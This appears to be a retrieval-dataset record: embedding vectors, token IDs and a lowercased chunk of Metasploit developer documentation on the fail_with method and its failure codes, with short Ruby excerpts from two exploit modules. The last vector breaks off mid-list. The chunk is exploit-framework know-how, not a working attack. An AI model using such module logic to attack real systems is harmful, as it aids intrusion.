0.1514454483985901, 0.7740923762321472, 0.3656332492828369, -0.45297345519065857, -0.44856417179107666, -0.4593365490436554, 0.17505507171154022, 0.6930407881736755, 0.7686288952827454, 0.6567105650901794, 0.2835945188999176, -0.17463864386081696, 0.512274444103241, 0.46438121795654297, -0.6967881917953491, -0.1326579451560974, -0.4941241443157196, 0.4302753210067749, -0.2572142779827118, -0.23955124616622925, 0.009335231967270374, -0.34392842650413513, -0.3331708312034607, 0.24851304292678833, -0.129691019654274, 0.051706891506910324, -1.065726637840271, 0.5152397155761719, 0.603072464466095, 0.38448476791381836, 0.8573635816574097, -0.687526285648346, -0.3224543035030365, 0.6177436709403992, 0.3019760847091675, -0.6960680484771729, -0.05386056751012802, -0.2186485081911087, 0.06925475597381592, 0.684417724609375, -0.030873194336891174, -0.5516093373298645, -0.3789929449558258, -0.4847191870212555, -0.3709583282470703, 0.4273957908153534, 0.9151362180709839, -0.09784872084856033, 0.23686812818050385, -0.7388348579406738, 0.7176286578178406, 0.6795455813407898, -0.23680627346038818, 0.04485391080379486, -0.707127034664154, -0.060792502015829086, -0.09454739093780518, -0.08662980794906616, -0.7206891775131226, -0.0826692208647728, -0.2311663031578064, -0.41568535566329956, 0.4884040653705597, -0.9120444655418396, -0.33345192670822144, -0.14443650841712952, 0.06007117033004761, 0.68726646900177, 0.236410453915596, -0.06504277139902115, 0.0630667507648468, -0.20817597210407257, 0.3462049663066864, -0.08233920484781265, -0.5430313944816589, 0.5205231308937073, -0.08194142580032349, -0.4127778112888336, 0.30732378363609314, -0.1218428760766983, -0.30635446310043335, 0.23339058458805084, 0.039314862340688705, -0.6965578198432922, -0.1512192040681839, 0.030939780175685883, 0.7740061283111572, -0.918129026889801, 0.3021291196346283, -0.11093870550394058, -0.4191013276576996, 1.2583924531936646, 0.09933716058731079, -1.2440826892852783, 0.8218511343002319, -0.8712295889854431, 0.07638848572969437, 0.02501525729894638, -1.2461079359054565, 0.7650381326675415, -0.6830213665962219, -0.8175331354141235, 0.5180577039718628, -0.24281178414821625, 0.10642334073781967, -0.45692962408065796, -0.48233529925346375, -0.08479059487581253, 0.3166545033454895, -0.22169508039951324, 0.6857418417930603, -0.2611426115036011, -0.8965290188789368, 0.5869459509849548, -0.17184458673000336, 0.7209242582321167, 0.082767553627491, -0.00572618842124939, 0.270364373922348, -0.07559549808502197, -0.5795122385025024, 0.10255740582942963, -0.9994961023330688, -0.14220958948135376, 0.051565010100603104, 0.458339661359787, 0.35935425758361816, -0.14087019860744476, -0.698236346244812, 0.020101988688111305, 0.5965096950531006, -0.30816739797592163, -0.4240817427635193, 0.25184011459350586, -0.5186673402786255, 0.8239830136299133, 0.40092384815216064, -0.08599211275577545, -0.9954624772071838, -0.5465800762176514, 1.076966404914856, -0.2855525612831116, -0.2802870571613312, -0.30128300189971924, -0.6681485176086426, -0.6036699414253235, 0.2703731656074524, -0.30696842074394226, -0.8562594652175903, -0.25055280327796936, -0.45489153265953064, 0.5411251783370972, -0.46242183446884155, 0.24315689504146576, -0.3816192150115967, 0.33029916882514954, -0.2757006585597992, 0.9027895927429199, -0.03264913335442543, 0.38642311096191406, 0.4388158321380615, 0.14306142926216125, 0.060347773134708405, 0.4775841236114502, -0.693713903427124, -0.08114650100469589, 0.010036906227469444, -0.21087457239627838, -0.26044246554374695, -0.4166363477706909, -0.33949267864227295, 0.4396112859249115, -0.3716220557689667, 0.03632297366857529, 0.2329767346382141, -0.49078619480133057, -0.04270303621888161, 0.34364405274391174, 0.2609899938106537, -0.6694532036781311, 0.9431803822517395, 0.2181517779827118, 0.4153481721878052, -0.6874812245368958, -0.015798747539520264, -1.0186570882797241, -0.07740108668804169, -1.154543399810791, -0.6354096531867981, 0.0034372801892459393, -0.6186087131500244, -0.24436190724372864, -0.09861742705106735, -0.6803078651428223, 0.5037681460380554, -0.824752688407898, 0.2102913111448288, 1.081290602684021, 0.017424389719963074, 0.13006551563739777, -1.1786097288131714, 0.3252467215061188, 0.3572487533092499, -1.1021257638931274, -0.2631998062133789, 0.30888327956199646, -0.8140504360198975, -0.0974830836057663, -0.16049355268478394, -0.8540417551994324, -0.7831252217292786, 0.040190063416957855, 0.7651990652084351, 0.41907039284706116, 0.5410576462745667, 0.3074633777141571, -0.007377008441835642, -1.3039991855621338, 0.5358231663703918, 0.43207213282585144, 0.3597052991390228, 0.7704547047615051, 0.2079058587551117, 0.6294957399368286, 1.0015054941177368, -0.3479428291320801, 0.22213159501552582, -0.46187543869018555, 0.5643261075019836, -0.1217118576169014, -0.5133485794067383, 0.44667136669158936, 0.5951220989227295, -0.7388179302215576, -0.2720823287963867, -0.7439928650856018, -0.10320468991994858, -0.26612284779548645, -0.22380395233631134, -1.1783735752105713, 0.1296694576740265, -0.32567691802978516, 0.12789015471935272, 0.04609978571534157, 0.9971493482589722, 0.09782698005437851, -0.7802049517631531, 0.10764075070619583, 0.2755778431892395, 0.2152005285024643, 1.4350630044937134, -0.2730739712715149, -0.15564893186092377, -0.7692341208457947, -0.0479264073073864, -0.7682336568832397, 0.5794513821601868, 0.8451911211013794, 0.21477147936820984, 1.0982142686843872, 0.32138264179229736, 0.2609294056892395, 1.2194932699203491, -0.37174302339553833, 0.2821292579174042, 0.2529752254486084, -0.7172020673751831, -0.891481876373291, 0.1729966551065445, 0.28957343101501465, -0.42006924748420715, -0.02916177548468113, -0.011861446313560009, 0.5601252317428589, -0.13505181670188904, 0.94314044713974, -0.09014445543289185, -1.0624312162399292, -0.09720224142074585, -0.9416401386260986, -0.33113405108451843, -0.6028806567192078, 0.21430782973766327, -0.959112286567688, 0.24213996529579163, -0.2546525299549103, -0.4980023205280304, -0.5364735126495361, 0.9393200278282166, 0.06395094841718674, 0.06696926802396774, -0.8491578698158264, -0.420595645904541, -0.8418646454811096, -0.588505208492279, -1.0741069316864014, -0.20289179682731628, 0.24484582245349884, -0.11369272321462631, 0.25722116231918335, -0.2935366630554199, -0.6274808645248413, 1.0489546060562134, 0.4703007638454437, 0.29834723472595215, 0.07071305811405182, 0.17094829678535461, -0.4307180643081665, -0.8228279948234558, 0.49333488941192627, -0.5098985433578491, 0.24337942898273468, -0.550650954246521, 0.5935041904449463, 0.25433099269866943, -0.14677925407886505, -0.5014378428459167, 0.16385532915592194, 0.792812168598175, -0.34841614961624146, -0.6690155863761902, -0.5545037984848022, 0.5722252130508423, -0.7046308517456055, 0.14845037460327148, -0.4085153341293335, 0.3397139012813568, 0.30354025959968567, 0.4941598176956177, 0.12176980078220367, 0.7432680130004883, 0.04303806275129318, 0.588284969329834, 0.0661272406578064, 0.3663557469844818, 0.5875917077064514, 0.5134715437889099, 0.1503971666097641, -0.01360329519957304, 0.6035653948783875, -0.2590042054653168, 0.8131636381149292, 0.6954761147499084, 0.5448575019836426, 0.8274837136268616, -0.1986050009727478, 0.32501548528671265, -0.36918169260025024, -0.15348035097122192, 0.0057185641489923, 0.24957482516765594, -0.47431692481040955, 0.14273272454738617, -0.3017253875732422, 0.1165267825126648, 0.43579766154289246, -0.21514706313610077, -0.9095571041107178, -1.4198963642120361, 0.467745840549469, -1.1623235940933228, -0.21821065247058868, -1.0516471862792969, -0.43046268820762634, -1.0083147287368774, 0.1940348893404007, -0.19794809818267822, 0.1229235902428627, 0.49629250168800354, 0.1766381859779358, 0.5272636413574219, -0.6892523169517517, 0.18496769666671753, 0.20126336812973022, 0.08187630772590637, -0.6540629863739014, -1.2835416793823242, 0.11066506057977676, 1.3900423049926758, 0.33881157636642456, -0.1368175595998764, -0.7880592942237854, 0.1150326058268547, -0.8496702313423157, 0.6174135208129883, -0.13322193920612335, -0.5802165269851685, -0.9387887120246887, -0.11998111754655838, -0.2972806990146637, 0.673924446105957, -0.12018764764070511, -0.30248311161994934, 0.5862270593643188, -0.16877305507659912, -0.30248236656188965, 0.25789088010787964, 0.3640044927597046, 0.05252937600016594, 0.5593850612640381, 0.2697179913520813, 0.3993428647518158, -0.15049345791339874, -0.32544276118278503, -0.1442980021238327, 1.074965476989746, 0.5489782094955444, 1.0094200372695923, 0.15028983354568481, 0.7316473126411438, -0.31871241331100464, -1.0098621845245361, -0.9917391538619995, 0.5111765265464783, -0.1766919493675232, -0.4316824972629547, 0.38048800826072693, -0.5443800687789917, 0.469503790140152, 0.05624537542462349, 0.13797783851623535, 0.4454551041126251, -0.3949558734893799, -0.06820502132177353, -0.08117798715829849, -0.14758819341659546, 0.32802703976631165, -0.841974675655365, 0.2682526409626007, -0.06608390063047409, -0.210939422249794, 1.0854421854019165, 0.49863341450691223, -0.5818817019462585, 0.06888933479785919, 0.40089619159698486, 0.8403596878051758, 0.14185504615306854, 0.31743717193603516, -0.27317848801612854, 0.5226714015007019, -0.2480839192867279, 0.5707560777664185, -0.5471487045288086, 0.033439915627241135, -0.07436133176088333, 0.11341412365436554, -0.6003336906433105, 0.3584797978401184, 0.11424528807401657, -0.38628512620925903, 0.26470309495925903, -0.3276422917842865, -0.0856051966547966, -0.5193492770195007, 0.003050754079595208, -0.6648062467575073, 0.16423526406288147, 0.6832034587860107, -0.2806878089904785, 0.13988009095191956, 0.5945000052452087, -0.5011132955551147, 0.20660318434238434, -0.16468016803264618, 0.9039881229400635, -0.14271816611289978, 0.5732201933860779, 0.6899873614311218, -0.3354695737361908, 0.17597122490406036, -0.41511034965515137, -0.5920504927635193, -0.15224537253379822, -0.02998645417392254, 0.19812233746051788, -0.30156874656677246, -1.119125485420227, -0.49164167046546936, -0.8845812678337097, 0.402136892080307, -0.11094414442777634, -0.9497830867767334, 0.8207629323005676, -0.047837838530540466, -0.9128136038780212, 0.13084062933921814, 0.3439982533454895, 0.3419150710105896, -0.16877159476280212, 0.04355804994702339, 0.07870448380708694, -0.45469197630882263, 0.11989191919565201, -0.47685375809669495, 0.15716372430324554, 0.18678568303585052, -0.6819244027137756, -0.6088619828224182, -0.42083683609962463, 0.527451753616333, 0.09580028057098389, 0.2961573004722595, 0.5382626056671143, 0.06424286216497421, 1.1760929822921753, 0.5545057058334351, 0.1509997546672821, -0.4801561236381531, -0.6909061074256897, 0.8324518799781799, 1.119463324546814, -0.0007027176325209439, 0.49431511759757996, 0.2056971937417984, 0.044455159455537796, 0.12111867219209671, 0.1697433739900589, -0.14823637902736664, -0.4523874819278717, -0.20085309445858002, -0.9356271624565125, 0.1854141503572464, -0.4731069803237915, -0.7726446390151978, -0.5310952067375183, 0.2947928309440613, 0.1492982804775238, 0.25787392258644104, -0.20931486785411835, 0.46108585596084595, -0.7380220890045166, -0.5353143811225891, -0.18623439967632294, -0.18332909047603607, -0.5134322047233582, -0.7346548438072205, 0.49663740396499634, -1.092358112335205, 4.045161247253418, -0.1247410699725151, 0.6444652080535889, 0.4959056079387665, 0.0009275267366319895, 0.7601001858711243, -0.00600593164563179, 0.089813731610775, 0.2594495415687561, -0.646636426448822, -0.020247187465429306, -0.20933404564857483, -0.041891761124134064, 0.5404297709465027, -0.6295860409736633, 0.20621098577976227, -1.1194020509719849, -0.1158364936709404, 0.6671320199966431, -0.7589646577835083, -0.7556023597717285, -0.3955742120742798, -0.04321574792265892, 1.07957923412323, 0.5163848400115967, -0.10213734954595566, -0.012575536966323853, -0.5683965682983398, -0.06159033998847008, 0.2606361508369446, 0.3952099680900574, 0.027033014222979546, 0.440818727016449, -0.012600962072610855, -0.23362748324871063, 0.037343867123126984, 0.7679007053375244, -0.18191836774349213, 0.4740280210971832, -0.7285763621330261, 0.24197140336036682, -0.562807023525238, -0.2960068881511688, -0.5145047903060913, -0.0784381777048111, 0.00020872362074442208, 0.2564608156681061, 0.7390931248664856, 0.8339135646820068, -0.5447256565093994, 0.34768012166023254, -0.3400919437408447, 0.4487823247909546, -1.091031789779663, -0.6465474963188171, -0.2605610191822052, -0.5704073905944824, -0.2885293960571289, -0.3652583360671997, -0.1228078082203865, 0.1691485047340393, -0.26916414499282837, -0.1585797369480133, 0.6288614869117737, -0.9577197432518005, 0.11758571118116379, 0.40768763422966003, -0.1293199360370636, -0.2637522220611572, -0.10485994070768356, 0.11560751497745514, -0.5023676156997681, -0.3517098128795624, -0.1081903874874115, 0.48757311701774597, 0.539297342300415, -0.19932860136032104, 0.5280202627182007, 0.021460330113768578, -0.1455100178718567, 0.5653043389320374, 0.33547502756118774, -0.2124752551317215, 0.049541350454092026, 0.5392434000968933, 0.21497832238674164, -0.7010830640792847, -0.04747782275080681, 0.2126762717962265, 0.18355554342269897, 0.3213376998901367, 0.8706594705581665, -0.23919379711151123, 0.434198260307312, 0.30343854427337646 ]
[ 1012, 1026, 1999, 4183, 1028, 1006, 24471, 2140, 1012, 9262, 1024, 5354, 2509, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 24471, 6392, 3619, 1012, 2131, 16429, 20614, 1006, 24471, 6392, 3619, 1012, 9262, 1024, 5179, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 24471, 6392, 3619, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 11717, 18093, 2015, 2005, 12436, 17190, 2078, 2487, 1012, 1012, 1012, 11717, 18093, 2015, 2005, 12937, 2487, 1012, 1012, 1012, 7561, 2096, 11717, 2030, 7642, 6026, 18093, 9262, 1012, 11374, 1012, 6206, 2906, 22850, 15781, 2595, 24422, 1024, 2919, 3094, 4289, 1012, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 12937, 2487, 1012, 2131, 16429, 20614, 1006, 12937, 2487, 1012, 9262, 1024, 5354, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 18093, 2015, 1012, 12937, 2487, 1012, 2131, 16429, 20614, 1006, 12937, 2487, 1012, 9262, 1024, 4749, 1007, 2012, 1061, 17063, 11610, 2140, 1012, 9699, 4502, 8516, 10441, 2094, 1012, 2364, 1006, 9699, 4502, 8516, 10441, 2094, 1012, 9262, 1024, 4090, 1007, 7561, 1024, 7561, 2098, 2096, 11717, 1005, 12937, 2487, 1005, 1998, 2009, 2097, 2025, 2022, 3569, 2589, 999, 5147, 7013, 1014, 10763, 18093, 2015, 1998, 2570, 8790, 18093, 2015, 1012, 16791, 1022, 4895, 6342, 9397, 15613, 18093, 2015, 1012, 2012, 6503, 1010, 1996, 2951, 1013, 1061, 17063, 11610, 2140, 1035, 18093, 2015, 1012, 1046, 3385, 5371, 2003, 2058, 15773, 1998, 1996, 2570, 8790, 18093, 2015, 2024, 3201, 2005, 2224, 2306, 1996, 7705, 1012, 9707, 1010, 1996, 9722, 2323, 3582, 1996, 3115, 21025, 2102, 8853, 2000, 5587, 1998, 10797, 1996, 2047, 1046, 3385, 5371, 2077, 11717, 1037, 4139, 5227, 1998, 4899, 1996, 7172, 1046, 3385, 2046, 1996, 7705, 1521, 1055, 3040, 3589, 1012, 102 ]
metasploit
133.txt
5
[CLS] on this pageexample usescomprehensive list of fail _ with parameterswhen a module fails, the fail _ with method provides a standardized way to describe the reason for the failure. the first parameter depends on the cause of the failure. example usesmodules / exploits / osx / local / sudo _ password _ bypass. rb fails using failure : : notvulnerable if the check method does not indicate that the target is vulnerable : if check! = checkcode : : vulnerable fail _ with failure : : notvulnerable,'target is not vulnerable'end modules / exploits / multi / http / struts2 _ namespace _ ognl. rb fails using the failure : : payloadfailed if the target ’ s response does not include a string indicating that the payload successfully executed. alternatively, if the target responds with an http error, the module invokes fail _ with using the failure : : unexpectedreply parameter : if r & & r. headers & & r. headers ['location']. split ('/') [ 1 ] = = success _ string print _ good ( " payload successfully dropped and executed. " ) elsif r & & r. headers ['location'] vprint _ error ( " response : " + r. headers ['location'] ) fail _ with ( failure : : payloadfailed, " target did not successfully execute the request " ) elsif r & & r. code = = 400 fail _ with ( failure : : unexpectedreply, " target reported an unspecified error while executing the payload " ) end comprehensive list of fail _ with parametersthe following are currently used fail _ with parameters and a brief description of common uses. fail _ with parameterreason for failurefailure : : badconfigthe user - provided parameters are invalid and must be corrected. failure : : disconnectedthe target closed the connection forcibly. failure : : noaccessan attempt to authenticate failed, likely due to invalid credentials. failure : : nonethe outcome for the module has already been met, for example a privilege escalation is already in an elevated context ) failure : : notargetthe specified target or payload variables are misconfigured or the target environment is unsupported. failure : : notfounda preexisting file or resource on target is missing. failure : : notvulnerablethe target returned a response indicative of
[ 0.4949454367160797, -0.6123834252357483, -0.09396093338727951, 0.404273122549057, -0.14580827951431274, -0.1546834111213684, 0.3031034469604492, -0.3037150502204895, 0.5271761417388916, 0.9232361912727356, 0.12893016636371613, 0.016768068075180054, 0.19595757126808167, -0.2811760902404785, -0.7088223099708557, 0.1131330206990242, 0.2019539773464203, 0.07007627189159393, -1.1398508548736572, 0.34091290831565857, 0.3767801523208618, 0.24376995861530304, -0.6759192943572998, -0.2866295576095581, -0.7637607455253601, 0.19422174990177155, 0.49814021587371826, -0.0026622884906828403, 0.6868545413017273, 0.6462714672088623, 0.5068599581718445, -0.22979795932769775, -0.2881408929824829, -0.1763937622308731, 0.0349796898663044, -0.27790310978889465, 0.45663902163505554, -0.4971567988395691, 0.32610395550727844, -1.0402207374572754, 0.5633035898208618, -0.12739932537078857, 0.24647530913352966, -0.4406103789806366, -0.11336458474397659, -0.014462779276072979, 0.007096192799508572, -0.34773197770118713, 0.15014998614788055, -0.4130113422870636, -0.12179918587207794, 0.5405558347702026, -0.02978120930492878, 0.08225914090871811, 0.013084230944514275, -0.22988127171993256, 0.14341287314891815, 0.6261604428291321, -0.28181102871894836, 0.013855917379260063, -0.04029190167784691, 0.35181453824043274, 0.2590728998184204, -0.3766312897205353, -0.47415149211883545, 0.10224314033985138, 0.15626394748687744, -0.2507745325565338, 0.10779058188199997, -0.8217660188674927, -0.025924591347575188, 0.8954980373382568, -0.3427874445915222, -0.6800521612167358, -0.8300352692604065, -0.24249114096164703, 0.19740645587444305, -0.20421317219734192, -0.1758817434310913, 0.7558973431587219, 0.5024077296257019, 1.353472113609314, 0.01472775824368, 0.0526571162045002, 0.21165908873081207, -0.8398002982139587, 0.3368259370326996, 0.9280787706375122, -0.9444575309753418, 0.7404122352600098, 0.2999345064163208, 0.7927536964416504, -1.1155356168746948, -0.32586240768432617, 0.35705408453941345, 0.33038732409477234, -0.6687185764312744, -0.0308888740837574, -0.31670722365379333, 0.04264494404196739, 0.6014772057533264, 1.1311867237091064, 0.26573094725608826, 0.1959390938282013, -0.6356194019317627, 0.22397854924201965, 0.47428783774375916, 0.058654457330703735, -0.49312496185302734, -0.3289742171764374, 0.11482828855514526, 0.1680585891008377, -0.2732178270816803, -0.5041847229003906, -0.12632866203784943, 0.465744286775589, 0.33200573921203613, -0.34815946221351624, -0.7477405667304993, 1.007103443145752, 0.11425598710775375, -0.41154009103775024, 0.14222615957260132, 0.09693758189678192, 0.42384064197540283, 0.13490618765354156, 0.7308242321014404, 0.6833149194717407, -0.6638774871826172, -0.35210299491882324, -0.2585236132144928, -0.2639566957950592, -0.0013490411220118403, 0.7328853011131287, -0.373694509267807, -0.14556099474430084, 0.03636366128921509, 0.28737542033195496, 0.5129023194313049, -0.6067379713058472, 0.2858852744102478, 0.7442282438278198, 0.5613114237785339, 1.011983036994934, 0.05853375419974327, -0.0071782311424613, 0.18797315657138824, -0.34939321875572205, -0.8407220244407654, 0.891781210899353, -0.060044221580028534, -0.09596042335033417, 0.13331586122512817, 0.09041698276996613, -0.4353486895561218, 0.11666867882013321, -0.26101788878440857, 0.238155335187912, -0.12053591012954712, -0.12865865230560303, 0.1996210366487503, 0.9620475769042969, 0.44493037462234497, 0.2923370599746704, 0.013484703376889229, 0.29227015376091003, -0.9101150631904602, -0.896973192691803, -0.044006578624248505, -0.08469054847955704, 0.49536460638046265, 0.9108875393867493, 0.44968295097351074, 0.09570417553186417, 1.3975802659988403, 1.254285216331482, -0.06507355719804764, -0.5263076424598694, 0.3933368921279907, 0.4663688838481903, -0.4635917544364929, 0.14586235582828522, 0.1802690178155899, 0.6899400353431702, -0.04321347549557686, 0.3555994927883148, -0.11545360833406448, -0.7354579567909241, 0.11737073957920074, -0.4755464196205139, -0.19730499386787415, 0.5332660675048828, -0.42363327741622925, 0.7743284702301025, 0.6068751811981201, -0.030011802911758423, -0.5257660746574402, -0.39779287576675415, -0.13908401131629944, -1.4878262281417847, -0.8639082312583923, 0.21677535772323608, -0.10722862929105759, 0.22547441720962524, -0.44222259521484375, -0.06437135487794876, 0.6868452429771423, 0.5572751760482788, 0.200225830078125, 0.4583633840084076, 1.0952892303466797, -0.6570764183998108, -0.4301491975784302, 0.4504415988922119, 0.29104965925216675, -0.4492053687572479, -0.7749360203742981, 0.3544335663318634, 0.26165851950645447, 0.39548414945602417, -0.6407985091209412, 0.6228776574134827, 0.057117052376270294, 0.09394346177577972, -0.3492273688316345, -0.651977002620697, -0.01179678738117218, 0.6889292001724243, -0.48510053753852844, -0.005136267282068729, -0.25084251165390015, 0.3039833903312683, 0.024899045005440712, 0.9722223281860352, 0.4849349856376648, -0.35303327441215515, -0.025710472837090492, 0.5206831693649292, 0.4875282347202301, 0.04626098647713661, 0.0840134471654892, 0.8310158848762512, 0.49020740389823914, 0.6726551651954651, 0.3416915535926819, 0.3425044119358063, 0.28514447808265686, 0.21212542057037354, 0.30235254764556885, 1.0299586057662964, 0.07126252353191376, 1.6098662614822388, 0.6897161602973938, -0.28886133432388306, -0.8797959089279175, -0.3623906075954437, 0.19141052663326263, 0.5039180517196655, -1.1690703630447388, -0.1894807368516922, 0.26884129643440247, 0.2458098977804184, -0.5303229093551636, -0.16381685435771942, 0.43597400188446045, 0.38534581661224365, -0.051413822919130325, 0.6998623609542847, 0.23902280628681183, -0.6433548331260681, -0.25002938508987427, -0.16583134233951569, -1.0863010883331299, -0.57914137840271, -0.7338537573814392, -0.16258801519870758, 0.23563122749328613, -0.5212931632995605, 0.6477766633033752, -0.3903331160545349, -0.7249342203140259, -0.02020338736474514, 0.13603417575359344, 0.7546805143356323, -0.1385382115840912, 0.24752967059612274, -1.051926851272583, 0.01229748222976923, -0.23542505502700806, 0.45186394453048706, -0.17115147411823273, -0.20715266466140747, 0.15316559374332428, 0.2706124484539032, 0.011159023270010948, 0.12914492189884186, 0.6816667318344116, 0.5535461902618408, -0.20343106985092163, -0.349975049495697, 0.0066307103261351585, -0.30269792675971985, 0.6833868622779846, -0.14603811502456665, -0.21256861090660095, 1.1174020767211914, 0.21099413931369781, -0.27930256724357605, 0.5148607492446899, 0.7207807898521423, -0.8208547830581665, 0.41118553280830383, -0.22564253211021423, 0.0846809446811676, -0.4502016305923462, 0.34292927384376526, 0.2585463523864746, -0.4348168969154358, 0.07645044475793839, -0.31564685702323914, 0.17065510153770447, -0.5602380633354187, 0.02337750606238842, -0.3991043269634247, -0.2180895060300827, 0.2003246545791626, -0.007167390082031488, -1.0335344076156616, 0.28599652647972107, -0.8183154463768005, -0.11305570602416992, -0.25125744938850403, 0.2930137515068054, 0.9881696105003357, -0.059650029987096786, 0.5144938230514526, -0.023362204432487488, -0.0796223133802414, -0.23336397111415863, -0.46609532833099365, 0.10369495302438736, -0.3835626244544983, 0.0728759840130806, 0.44333744049072266, 0.21615032851696014, 0.7568434476852417, 0.44548332691192627, -0.12829147279262543, -0.12409914284944534, 0.49472716450691223, -0.341322660446167, 0.4493023157119751, 0.6206203103065491, -0.08239958435297012, -0.11428189277648926, 0.8859270811080933, -0.17337211966514587, -0.43998026847839355, -0.2556762397289276, -0.09367774426937103, 0.03378884494304657, -0.2550600469112396, -0.10796479880809784, 0.6881290674209595, -0.4363044500350952, -0.6944625973701477, 0.1478371024131775, 0.12239600718021393, 0.31052279472351074, 0.0778985396027565, 0.7761538624763489, 0.08363039791584015, -0.1282050758600235, 0.4016028344631195, 0.07087443023920059, -0.3167658746242523, 0.5454367995262146, 0.3569560647010803, 0.8688002228736877, 0.01758427545428276, -0.09687414765357971, 0.11751904338598251, -0.2798832356929779, 0.17444419860839844, 0.18602994084358215, -0.17096373438835144, 0.06268252432346344, -0.6734715700149536, -0.3299357295036316, 0.07197876274585724, 0.11446888744831085, -0.8510267734527588, 0.12235309183597565, -0.45097973942756653, -0.382893443107605, -0.4209960997104645, 0.5190446376800537, 0.6105242967605591, 0.5176572203636169, 0.45265012979507446, 0.6205517649650574, 0.7120822072029114, -0.6222491264343262, 0.5368414521217346, -0.30615702271461487, 0.1678883582353592, -0.4058798849582672, 0.6127432584762573, -0.1919248402118683, -0.29712697863578796, -0.7912755012512207, -0.004366557579487562, 0.09009163826704025, -0.18002648651599884, 0.462631493806839, 0.21853874623775482, -0.12258598953485489, -0.4991722106933594, -0.00785360112786293, 0.33631619811058044, 0.08739589899778366, -0.8354648351669312, 0.20446710288524628, 0.40271738171577454, 0.8389637470245361, -0.8500832319259644, 0.29955029487609863, -0.664355993270874, 0.15205664932727814, 0.3968740403652191, -0.2745373249053955, -0.3304744362831116, -0.5869772434234619, -0.4284864664077759, -0.45901188254356384, -0.0982937216758728, 0.4010317325592041, -0.3477495312690735, 0.1653795838356018, -0.8417290449142456, 0.442263126373291, 0.5498015284538269, -0.6447378396987915, -0.11616908013820648, 0.16562411189079285, 0.6587426662445068, 0.19415679574012756, 0.5186756253242493, -1.1322767734527588, -0.36295098066329956, 0.40411078929901123, -1.1837047338485718, 0.7350897192955017, -1.095525860786438, 0.5120903253555298, 0.12168475985527039, -0.0422334149479866, -0.15927809476852417, -0.09089460968971252, -0.468058705329895, 0.14437851309776306, -0.3222789764404297, -0.16785523295402527, -0.6395065188407898, 0.4098740220069885, 1.1413618326187134, 0.07337125390768051, -0.3623087704181671, 0.7807024121284485, 0.22127968072891235, -0.07077386230230331, -0.04366659000515938, -0.060078784823417664, -0.4559782147407532, 0.006308036390691996, -0.555157482624054, 0.4743441045284271, 0.460007905960083, -0.1398608386516571, 0.05908244475722313, -0.667621374130249, 0.7371318936347961, 0.06131858378648758, -0.457427978515625, -0.7292402386665344, -0.8127661943435669, -0.084509938955307, -0.0012789025204256177, 0.18177272379398346, 0.45066237449645996, -0.21693144738674164, 0.28080493211746216, -0.6871883273124695, -0.22107824683189392, -1.2260349988937378, -0.4561517834663391, -0.1735328882932663, -0.355333536863327, 0.15641045570373535, -0.2849034368991852, 0.21006523072719574, -0.08035477995872498, -1.1431996822357178, 0.5105060935020447, -0.2016386091709137, -0.1404171735048294, -0.897010862827301, -0.057113442569971085, -0.4435190260410309, -0.10393325984477997, -0.06095797196030617, -0.12488118559122086, -0.19317051768302917, 0.5073239803314209, -0.1621035635471344, -0.2050229012966156, 0.362496554851532, -0.386167973279953, -0.13027887046337128, 0.48793327808380127, 0.5359227061271667, -0.7311487793922424, -0.3267460763454437, 0.2737724781036377, -0.0806381106376648, -0.07155884057283401, -1.059358835220337, -0.018700793385505676, -0.3163595199584961, -0.9916185736656189, -0.208188995718956, -0.28071779012680054, 0.05855778232216835, -0.8379343152046204, -0.2622498571872711, -0.7856647372245789, 0.35470208525657654, 0.2804342806339264, -0.8661824464797974, 0.1179695650935173, -0.16968804597854614, 0.5324551463127136, 0.2058301866054535, -0.5337780117988586, -0.35220351815223694, -0.5745347142219543, 0.00009461033914703876, 1.3357070684432983, -0.06330697238445282, -0.2736630439758301, -0.20114447176456451, -0.3327193260192871, 0.2048882097005844, 0.24328646063804626, -0.37544187903404236, -0.1349494308233261, -0.40316343307495117, 0.12812991440296173, -0.35430511832237244, 0.7899878621101379, -0.6023476719856262, 0.21851354837417603, 0.12498465180397034, 0.6403785943984985, -0.31839561462402344, -0.2798503041267395, -0.10130935907363892, 0.7674745917320251, 0.622527539730072, -0.2578592598438263, -0.12439607083797455, 0.21157942712306976, 0.33483442664146423, 0.2985372245311737, 0.2613070011138916, -0.36477190256118774, -0.010584558360278606, -0.6610375046730042, -0.6707003712654114, 0.4793160557746887, -0.058455199003219604, -0.3836073577404022, -0.25322985649108887, -0.12899671494960785, 0.6917112469673157, -0.025494981557130814, -0.28076550364494324, 0.9869518876075745, 0.1515764445066452, 0.07159902155399323, -0.9966920018196106, 0.07787813991308212, 0.6569229960441589, -0.1306050568819046, 0.3189873695373535, -0.8172426819801331, 0.07741441577672958, 0.10824623703956604, -0.4334821403026581, -0.09154311567544937, -0.5408385396003723, -0.17921380698680878, 0.6351748108863831, -0.13304443657398224, 0.34499382972717285, -0.4305252134799957, -0.9275807738304138, -0.49743619561195374, 0.25145989656448364, 0.12030741572380066, -0.4528945982456207, 0.5581917762756348, -0.053849004209041595, 0.4691079258918762, -1.090763807296753, -0.062269847840070724, -0.06915435940027237, 0.14053745567798615, 0.6462221145629883, 0.3252173364162445, -0.7470594048500061, 0.944575846195221, 0.3047695457935333, -0.8991291522979736, -0.404741495847702, -1.0385137796401978, -0.08600717037916183, 0.014002148993313313, -0.5986855030059814, -0.7133702635765076, 0.7747175097465515, 0.07952191680669785, 0.13227590918540955, 0.8161783218383789, -0.18950237333774567, 0.31577369570732117, -0.667776346206665, 0.09497717767953873, -0.5968149900436401, 0.14872634410858154, 0.5057789087295532, -0.052569884806871414, -0.4847949147224426, -0.5095643401145935, -0.316545307636261, -0.08529739826917648, -0.6649121642112732, 0.8317940831184387, 0.011082337237894535, 0.1140175461769104, -0.464412122964859, 0.2701382339000702, 0.8237955570220947, 0.04316991940140724, 0.30635687708854675, 1.1050490140914917, 0.3466624617576599, -0.2451505810022354, -0.6414031982421875, 0.03799758851528168, 0.38638681173324585, 0.9115909337997437, -0.3421069085597992, 0.004958580248057842, 0.03625435009598732, 0.6110745072364807, 0.09203317761421204, -0.691485583782196, -0.8513275980949402, -0.9324808120727539, -0.24356555938720703, 0.2664514183998108, -0.18111340701580048, 0.10279332846403122, 0.36980491876602173, -0.550250232219696, -0.3345106244087219, 